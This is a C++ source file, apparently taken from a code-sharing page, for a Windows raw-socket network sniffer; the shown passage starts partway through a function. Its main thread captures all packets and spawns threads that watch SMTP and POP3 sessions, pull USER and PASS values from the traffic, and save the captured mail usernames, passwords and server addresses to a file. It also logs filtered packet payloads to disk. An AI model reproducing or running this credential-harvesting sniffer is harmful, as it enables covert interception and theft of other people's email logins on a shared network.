📄 sniffer.cpp
字号:
gethostname(hostname,100);
myhost=gethostbyname(hostname);
hostip=inet_ntoa(*(in_addr *)myhost->h_addr_list[0]);
localsock.sin_family=AF_INET;
localsock.sin_port=htons(++BasePort);
localsock.sin_addr.S_un.S_addr=inet_addr(hostip);
if(bind(POPSocket,(const sockaddr *)&localsock,sizeof(localsock))==SOCKET_ERROR){
ErrorCode=7;
DeletePopListenIp(ListenIp);
DeleteSubThreadId(this_threadid);
return ErrorCode;
}
DWORD dwValue=1;
if(ioctlsocket(POPSocket,SIO_RCVALL,&dwValue)==SOCKET_ERROR){
ErrorCode=8;
DeletePopListenIp(ListenIp);
DeleteSubThreadId(this_threadid);
return ErrorCode;
}
//
printf("\r\n"+ListenIp+":sub thread POP sniffer start!try to sniffer data...\r\n");
int strlength=0;
while(true){
if(PeekMessage(&msg,NULL,WM_SNIFFER_CLOSE,WM_SNIFFER_CLOSE,PM_REMOVE)){
closesocket(POPSocket);
TRACE("subthread close ok!");
break;
}
SnifferStr=GetSnifferData(POPSocket,ListenIp,toport);
if(SnifferStr.Compare("no data")==0){
Sleep(1);
continue;
}
//if(SnifferStr.GetLength()<30) TRACE(SnifferStr);
int index;
CString LowSnifferStr;
LowSnifferStr=SnifferStr;
LowSnifferStr.MakeLower();
if(POPSTART){
if(index=LowSnifferStr.Find("user",0)==0){
if(index=SnifferStr.Find(" ",0)){
if(UserName=="no get username"){
strlength=SnifferStr.GetLength()-index-1;
UserName=SnifferStr.Mid(index+1,strlength-2);
}
}
}
else if(index=LowSnifferStr.Find("pass",0)==0){
if(index=SnifferStr.Find(" ",0)){
if(PassWord=="no get password"){
strlength=SnifferStr.GetLength()-index-1;
PassWord=SnifferStr.Mid(index+1,strlength-2);
}
}
POPSTART=false;
TRACE("get last data!\r\n");
GetMailOK=true;
break;
}
else if(index=LowSnifferStr.Find("quit",0)==0){
POPSTART=false;
TRACE("get last data!\r\n");
GetMailOK=true;
break;
}
}
Sleep(1);
}
if(GetMailOK&&UserName!="no get username"&&PassWord!="no get password"){
AllString=UserName+"\r\n"+PassWord+"\r\n"+PopIp;
printf("This is listen:\r\n"+AllString);
WritePOPSniffer(userinfo.SnifferDataPath,UserName,PassWord,PopIp);
}
closesocket(POPSocket);
Sleep(1000);
DeletePopListenIp(ListenIp);
DeleteSubThreadId(this_threadid);
TRACE("\r\nsub thread exit!");
return 0;
}
//
int SaveSelfDefSnifferData(CString Protocol,CString FromIp,CString FromPort,CString DestIp,CString DestPort,CString DataLen,CString PacketData)
{
bool cansave=false;
if(DataLen=="0") return 0;
//单向嗅探
if(userinfo.ProtoType.Find(Protocol,0)>=0||userinfo.ProtoType=="*")
if(userinfo.sourceip.Find(FromIp,0)>=0||userinfo.sourceip=="*")
if(userinfo.sourceport.Find(FromPort,0)>=0||userinfo.sourceport=="*")
if(userinfo.destip.Find(DestIp,0)>=0||userinfo.destip=="*")
if(userinfo.destport.Find(DestPort,0)>=0||userinfo.destport=="*")
cansave=true;
//双向嗅探
if(userinfo.Way==0){
if(userinfo.ProtoType.Find(Protocol,0)>=0||userinfo.ProtoType=="*")
if(userinfo.sourceip.Find(DestIp,0)>=0||userinfo.sourceip=="*")
if(userinfo.sourceport.Find(DestPort,0)>=0||userinfo.sourceport=="*")
if(userinfo.destip.Find(FromIp,0)>=0||userinfo.destip=="*")
if(userinfo.destport.Find(FromPort,0)>=0||userinfo.destport=="*")
cansave=true;
}
if(cansave){
int hfile;
hfile=open(userinfo.SelfSnifferDataPath,O_RDONLY|O_BINARY);
if(hfile){
long flen=filelength(hfile);
if((flen/1024)/1024>=userinfo.MaxData){
close(hfile);
remove(userinfo.SelfSnifferDataPath);
}
else close(hfile);
}
fsniffer=fopen(userinfo.SelfSnifferDataPath,"ab+");
printf("\r\n%-6s%-18s%-8s--> %-18s%-8s%sBytes\r\n------------------------------------------------------\r\n\0",Protocol,FromIp,FromPort,DestIp,DestPort,DataLen);
if(fsniffer!=NULL){
fprintf(fsniffer,"%-6s%-18s%-8s--> %-18s%-8s%sBytes\r\n------------------------------------------------------\r\n",Protocol,FromIp,FromPort,DestIp,DestPort,DataLen);
fwrite(PacketData,atoi(DataLen),1,fsniffer);
fputs("\r\n\r\n------------------------------------------------------\r\n",fsniffer);
fflush(fsniffer);
fclose(fsniffer);
}
else printf("File can not create...\r\n");
return 1;
}
return 0;
}
//主嗅探进程
UINT SnifferThread(LPVOID form_ptr){
MSG msg;
char buffer[65535];
int readnum,totalbytes,datalen,HeaderLen;
bool can=true;
IP_HEADER *IpHeader;
TCP_HEADER *TcpHeader;
UDP_HEADER *UdpHeader;
ICMP_HEADER *IcmpHeader;
CString FromIp,DestIp,FromPort,DestPort,Protocol,PacketData,DataLen,SnifferStr;
char fromip[20],destip[20];
char *pdata;
SNIFFER *getform=static_cast<SNIFFER *>(form_ptr);
getform->MainThreadId=GetCurrentThreadId();
while(true){
if(PeekMessage(&msg,NULL,WM_SNIFFER_CLOSE,WM_SNIFFER_CLOSE,PM_REMOVE)){
closesocket(RawSocket);
MessageSubThread(WM_SNIFFER_CLOSE);
TRACE("mainthread close ok1 and send message!");
break;
}
if(PeekMessage(&msg,NULL,WM_SNIFFER_STOP,WM_SNIFFER_STOP,PM_REMOVE)){
TRACE("go stop ok!");
while(true){
Sleep(100);
if(PeekMessage(&msg,NULL,WM_SNIFFER_RESTART,WM_SNIFFER_RESTART,PM_REMOVE)){
TRACE("restart ok!");
break;
}
if(PeekMessage(&msg,NULL,WM_SNIFFER_CLOSE,WM_SNIFFER_CLOSE,PM_REMOVE)){
closesocket(RawSocket);
MessageSubThread(WM_SNIFFER_CLOSE);
TRACE("thread close ok!2");
return 0;
}
}
}
//sniffer deail code
ZeroMemory(buffer,65535);
datalen=0;
readnum=recv(RawSocket,buffer,65535,0);
if(readnum==SOCKET_ERROR){
getform->ErrorCode=13;
Sleep(2);
continue;
}
IpHeader=(IP_HEADER *)buffer;
Protocol.Format("%s",GetProtocol((unsigned char)IpHeader->Protocol));
sprintf(fromip,"%d.%d.%d.%d",IpHeader->FromIP.address[0],IpHeader->FromIP.address[1],IpHeader->FromIP.address[2],IpHeader->FromIP.address[3]);
sprintf(destip,"%d.%d.%d.%d",IpHeader->ToIP.address[0],IpHeader->ToIP.address[1],IpHeader->ToIP.address[2],IpHeader->ToIP.address[3]);
FromIp.Format("%s",fromip);
DestIp.Format("%s",destip);
totalbytes=ntohs(IpHeader->TotalLen);
HeaderLen=(IpHeader->VersionHdl&0x0f)*4;
totalbytes-=HeaderLen;
switch(IpHeader->Protocol){
case IPPROTO_ICMP:
IcmpHeader=(ICMP_HEADER *)(buffer+HeaderLen);
datalen=totalbytes-ICMP_HEADER_LEN;
FromPort.Format("-");
DestPort.Format("-");
pdata=(char *)IcmpHeader+ICMP_HEADER_LEN;
PacketData.Format("type:%d code:%d data:%s",IcmpHeader->Type,IcmpHeader->Code,pdata);
break;
case IPPROTO_UDP:
UdpHeader=(UDP_HEADER *)(buffer+HeaderLen);
datalen=totalbytes-UDP_HEADER_LEN;
FromPort.Format("%d",ntohs(UdpHeader->FromPort));
DestPort.Format("%d",ntohs(UdpHeader->ToPort));
pdata=(char *)UdpHeader+UDP_HEADER_LEN;
PacketData.Format("%s",pdata);
break;
case IPPROTO_TCP:
TcpHeader=(TCP_HEADER *)(buffer+HeaderLen);
HeaderLen=((TcpHeader->HeaderLen)>>4)*4;
FromPort.Format("%d",ntohs(TcpHeader->FromPort));
DestPort.Format("%d",ntohs(TcpHeader->ToPort));
pdata=(char *)TcpHeader+HeaderLen;
PacketData.Format("%s",pdata);
datalen=totalbytes-HeaderLen;
break;
default:
FromPort.Format("-");
DestPort.Format("-");
datalen=totalbytes;
PacketData.Format("");
break;
}
DataLen.Format("%d",datalen);
//SnifferStr.Format("\r\n%s %18s%8s%18s%8s %s \r\nData:\r\n%s",Protocol,FromIp,FromPort,DestIp,DestPort,DataLen,PacketData);
if(userinfo.SnifferStartFlag==1){
if(DestPort.Compare("25")==0){
if(!SmtpIpIsListened(FromIp)){
InsertSmtpListenIpList(FromIp);
ListenSmtpIp=FromIp;
AfxBeginThread(SmtpSnifferThread,(LPVOID)NULL);
TRACE(FromIp+":create smtp thread ok!\r\n");
}
}
//
if(DestPort.Compare("110")==0){
if(!PopIpIsListened(FromIp)){
InsertPopListenIpList(FromIp);
ListenPopIp=FromIp;
PopServerIp=DestIp;
AfxBeginThread(PopSnifferThread,(LPVOID)NULL);
TRACE(FromIp+":create pop thread ok!\r\n");
}
}
}
//
if(userinfo.SelfSnifferStartFlag==1)
SaveSelfDefSnifferData(Protocol,FromIp,FromPort,DestIp,DestPort,DataLen,PacketData);
//
Sleep(1);
}
return 0;
}
//////////////////////////////////////////////////////////////////////
// Construction/Destruction
//////////////////////////////////////////////////////////////////////
SNIFFER::SNIFFER()
{
int i;
for(i=0;i<MAX_SUBTHREAD_NUM;i++){
SubThreadIdList[i]=0;/*
PopListenIpList[i]="1";
SmtpListenIpList[i]="1";*/
}
WsaStartup=false;
BasePort=LISTEN_PORT;
SnifferState=SNIFFER_STATE_CLOSE;
SnifferError[0]="operate success!";
SnifferError[1]="WSAStartup failed!";
SnifferError[2]="Sniffer has start!";
SnifferError[3]="Sniffer is stoping!";
SnifferError[4]="Invalid Socket!";
SnifferError[5]="setsockopt rcvtimeo failed!";
SnifferError[6]="setsockopt iphdrincl failed!";
SnifferError[7]="bind socket failed!";
SnifferError[8]="ioctlsocket failed!";
SnifferError[9]="thread is not stop!";
SnifferError[10]="thread close failed!";
SnifferError[11]="no thread run!";
SnifferError[12]="thread is not start!";
SnifferError[13]="recv data error!";
SnifferError[14]="send message to subthread error!";
userinfo.SnifferStartFlag=0;
userinfo.SelfSnifferStartFlag=0;
userinfo.Way=1;
WORD wsaVersion;
WSADATA WSAData;
wsaVersion=MAKEWORD(2,0);
if(WSAStartup(wsaVersion,&WSAData)==SOCKET_ERROR){
ErrorCode=1;
}
else{
ErrorCode=0;
WsaStartup=true;
}
}
//
SNIFFER::~SNIFFER()
{
if(WsaStartup) WSACleanup();
}
//
int SNIFFER::Start(/*LPVOID form_ptr*/)
{
if(WsaStartup){
//Form_ptr=form_ptr;
if(SnifferState==SNIFFER_STATE_START){
ErrorCode=2;
return ErrorCode;
}
if(SnifferState==SNIFFER_STATE_STOP){
ErrorCode=3;
return ErrorCode;
}
RawSocket=socket(AF_INET,SOCK_RAW,IPPROTO_IP);
if(RawSocket==INVALID_SOCKET){
ErrorCode=4;
return ErrorCode;
}
int rcvtimeout=5000;
if(setsockopt(RawSocket,SOL_SOCKET,SO_RCVTIMEO,(const char *)&rcvtimeout,sizeof(rcvtimeout))==SOCKET_ERROR){
ErrorCode=5;
return ErrorCode;
}
/*
int flag=1;
if(setsockopt(RawSocket,IPPROTO_IP,IPHDRINCL,(const char *)&flag,sizeof(flag))==SOCKET_ERROR){
ErrorCode=6;
return ErrorCode;
}
*/
char hostname[100];
char *hostip;
hostent *myhost;
sockaddr_in localsock;
gethostname(hostname,100);
myhost=gethostbyname(hostname);
hostip=inet_ntoa(*(in_addr *)myhost->h_addr_list[0]);
localsock.sin_family=AF_INET;
localsock.sin_port=htons(LISTEN_PORT);
localsock.sin_addr.S_un.S_addr=inet_addr(hostip);
if(bind(RawSocket,(const sockaddr *)&localsock,sizeof(localsock))==SOCKET_ERROR){
ErrorCode=7;
return ErrorCode;
}
DWORD dwValue=1;
if(ioctlsocket(RawSocket,SIO_RCVALL,&dwValue)==SOCKET_ERROR){
ErrorCode=8;
return ErrorCode;
}
SnifferState=SNIFFER_STATE_START;
AfxBeginThread(SnifferThread,(LPVOID)this);
TRACE("MAIN thread start ok!\r\n");
ErrorCode=0;
return ErrorCode;
}
else{
ErrorCode=1;
return ErrorCode;
}
}
//
int SNIFFER::ReStart()
{
if(SnifferState=SNIFFER_STATE_STOP){
if(MainThreadId){
PostThreadMessage(MainThreadId,WM_SNIFFER_RESTART,NULL,NULL);
ErrorCode=0;
return ErrorCode;
}
else{
ErrorCode=11;
return ErrorCode;
}
}
ErrorCode=9;
return ErrorCode;
}
//
int SNIFFER::SnifferClose()
{
if(SnifferState!=SNIFFER_STATE_CLOSE){
if(MainThreadId){
PostThreadMessage(MainThreadId,WM_SNIFFER_CLOSE,NULL,NULL);
SnifferState=SNIFFER_STATE_CLOSE;
MainThreadId=0;
ErrorCode=0;
return ErrorCode;
}
else{
ErrorCode=11;
return ErrorCode;
}
}
ErrorCode=10;
return ErrorCode;
}
//
int SNIFFER::Stop()
{
userinfo.SnifferStartFlag=0;
if(SnifferState=SNIFFER_STATE_START){
if(MainThreadId){
PostThreadMessage(MainThreadId,WM_SNIFFER_STOP,NULL,NULL);
ErrorCode=0;
return ErrorCode;
}
else{
ErrorCode=11;
return ErrorCode;
}
}
ErrorCode=12;
return ErrorCode;
}
//
char * SNIFFER::GetLastError(int errorcode)
{
return SnifferError[errorcode];
}
//
int SNIFFER::StartSelfDefineSniffer(CString ProtoType,CString sourceip,CString sourceport,CString destip,CString destport,int way,int maxdata,CString fpath)
{
userinfo.ProtoType=ProtoType;
userinfo.sourceip=sourceip;
userinfo.sourceport=sourceport;
userinfo.destip=destip;
userinfo.destport=destport;
userinfo.SelfSnifferStartFlag=1;
userinfo.Way=way;
userinfo.MaxData=maxdata;
wsprintf(userinfo.SelfSnifferDataPath,"%s",fpath);
return 1;
}
int SNIFFER::StopSelfDefineSniffer()
{
userinfo.SelfSnifferStartFlag=0;
return 1;
}
int SNIFFER::StartSniffer(CString fpath)
{
wsprintf(userinfo.SnifferDataPath,"%s",fpath);
userinfo.SnifferStartFlag=1;
return 1;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -